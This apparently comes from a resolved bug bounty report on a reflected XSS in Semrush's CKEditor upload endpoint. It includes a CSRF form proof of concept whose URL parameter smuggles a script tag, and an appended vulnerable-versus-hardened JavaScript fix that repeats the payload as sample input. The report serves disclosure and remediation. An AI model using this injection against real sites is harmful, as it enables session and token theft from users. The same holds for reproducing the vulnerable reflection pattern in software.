Post Based XSS On Upload Via CK Editor [semrush.com]
Low
Semrush
Reported by
apapedulimu
Vulnerability Details
Technical details and impact analysis
**Summary:**
XSS Via Post Method When Upload via CKEditor
**Description:**
This XSS is executed by the error message when uploading an image to
```
https://www.semrush.com/my-posts/api/image/upload/?CKEditor=text&CKEditorFuncNum=0&langCode=en
```
## Browsers Verified In:
* Firefox
## Steps To Reproduce:
- This is a POST-based XSS; it needs some CSRF to trigger the XSS
- Create .html code like:
```
<html>
<body>
<form action="https://www.semrush.com/my-posts/api/image/upload/?CKEditor=text&CKEditorFuncNum=dadasd</script><script>alert(document.domain)</script>&langCode=en" method="POST">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
- Then click the "Submit request" button
- Or go to http://labs.apapedulimu.click/xss-semrush.html
## Supporting Material/References:
{F314582}
## Impact
The XSS will be executed when the user clicks that button, and an attacker can steal the user's token, IP, etc.
Regards,
Apapedulimu
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Weakness
Cross-site Scripting (XSS) - Reflected
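
The fix for this class of bug, as an added example that is not part of the report and is not Semrush's code: a response builder that reflects `CKEditorFuncNum` into the upload callback page, shown in its vulnerable shape beside a hardened one. It assumes the endpoint answers with CKEditor 4's `CKEDITOR.tools.callFunction` callback page; the function names `unsafeUploadResponse`, `safeUploadResponse` and `jsString` are hypothetical.

```javascript
// Added example: hypothetical upload-error responder, not Semrush's code.
// Assumes the endpoint answers with CKEditor 4's classic callback page:
//   <script>window.parent.CKEDITOR.tools.callFunction(funcNum, url, message)</script>

// Vulnerable shape: the query value is pasted into the script block as-is,
// so a value containing "</script>" ends the block and starts a new one.
function unsafeUploadResponse(query, message) {
  return '<script>window.parent.CKEDITOR.tools.callFunction(' +
    query.CKEditorFuncNum + ", '', '" + message + "');</script>";
}

// Serialise a string for use inside an inline <script>: JSON quoting plus
// escaping of the characters that can close the element or break a line.
function jsString(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened shape: CKEditorFuncNum must be a short decimal integer, otherwise
// the request is rejected with a plain-text 400 and nothing is reflected.
function safeUploadResponse(query, message) {
  const raw = query.CKEditorFuncNum;
  // A repeated parameter may arrive as an array, so require a string first.
  if (typeof raw !== 'string' || !/^\d{1,6}$/.test(raw)) {
    return { status: 400, type: 'text/plain; charset=utf-8',
             body: 'Invalid CKEditorFuncNum' };
  }
  const funcNum = Number(raw);
  return {
    status: 200,
    type: 'text/html; charset=utf-8',
    body: '<script>window.parent.CKEDITOR.tools.callFunction(' + funcNum +
      ', "", ' + jsString(message) + ');</script>',
  };
}

// Constructed sample input: the parameter value from the report's form.
const reported = {
  CKEditorFuncNum: 'dadasd</script><script>alert(document.domain)</script>',
};
```

Validating the parameter as an integer removes the reflection entirely; the `jsString` escaping covers the error message, which is the other value written into the same script block.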